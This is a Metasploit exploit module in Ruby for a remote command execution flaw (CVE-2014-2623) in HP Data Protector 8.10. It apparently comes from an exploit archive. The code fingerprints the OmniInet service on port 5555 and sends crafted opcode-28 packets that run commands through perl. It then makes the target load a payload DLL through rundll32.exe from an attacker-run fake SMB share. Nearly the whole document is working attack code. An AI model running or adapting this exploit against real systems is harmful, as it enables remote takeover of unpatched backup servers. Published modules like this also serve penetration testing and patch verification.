HP Data Protector 8.10 Remote Command Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::SMB::Server::Share  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'HP Data Protector 8.10 Remote Command Execution',  
'Description' => %q{  
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary  
commands can be execute by sending crafted requests with opcode 28 to the OmniInet  
service listening on the TCP/5555 port. Since there is an strict length limitation on  
the command, rundll32.exe is executed, and the payload is provided through a DLL by a  
fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on  
Windows 7 SP1.  
},  
'Author' => [  
'Christian Ramirez', # POC  
'Henoch Barrera', # POC  
'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module  
],  
'References' =>  
[  
['CVE', '2014-2623'],  
['OSVDB', '109069'],  
['EDB', '34066'],  
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 2048,  
'DisableNops' => true  
},  
'Privileged' => true,  
'Platform' => 'win',  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' =>  
[  
[ 'HP Data Protector 8.10 / Windows', { } ],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 02 2014'))  
  
register_options(  
[  
Opt::RPORT(5555),  
OptString.new('FILE_NAME', [ false, 'DLL File name to share']),  
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])  
], self.class)  
  
deregister_options('FILE_CONTENTS')  
end  
  
def check  
fingerprint = get_fingerprint  
  
if fingerprint.nil?  
return Exploit::CheckCode::Unknown  
end  
  
print_status("#{peer} - HP Data Protector version #{fingerprint}")  
  
if fingerprint =~ /HP Data Protector A\.08\.(\d+)/  
minor = $1.to_i  
else  
return Exploit::CheckCode::Safe  
end  
  
if minor < 11  
return Exploit::CheckCode::Appears  
end  
  
Exploit::CheckCode::Detected  
end  
  
def peer  
"#{rhost}:#{rport}"  
end  
  
def get_fingerprint  
ommni = connect  
ommni.put(rand_text_alpha_upper(64))  
resp = ommni.get_once(-1)  
disconnect  
  
if resp.nil?  
return nil  
end  
  
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null  
end  
  
def send_pkt(cmd)  
cmd.gsub!("\\", "\\\\\\\\")  
  
pkt = "2\x00"  
pkt << "\x01\x01\x01\x01\x01\x01\x00"  
pkt << "\x01\x00"  
pkt << "\x01\x00"  
pkt << "\x01\x00"  
pkt << "\x01\x01\x00 "  
pkt << "28\x00"  
pkt << "\\perl.exe\x00 "  
pkt << "-esystem('#{cmd}')\x00"  
  
connect  
sock.put([pkt.length].pack('N') + pkt)  
disconnect  
end  
  
def primer  
self.file_contents = generate_payload_dll  
print_status("File available on #{unc}...")  
  
print_status("#{peer} - Trying to execute remote DLL...")  
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"  
send_pkt(sploit)  
end  
  
def setup  
super  
  
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"  
  
unless file_name =~ /\.dll$/  
fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")  
end  
end  
  
def exploit  
begin  
Timeout.timeout(datastore['SMB_DELAY']) {super}  
rescue Timeout::Error  
# do nothing... just finish exploit and stop smb server...  
end  
end  
end  
`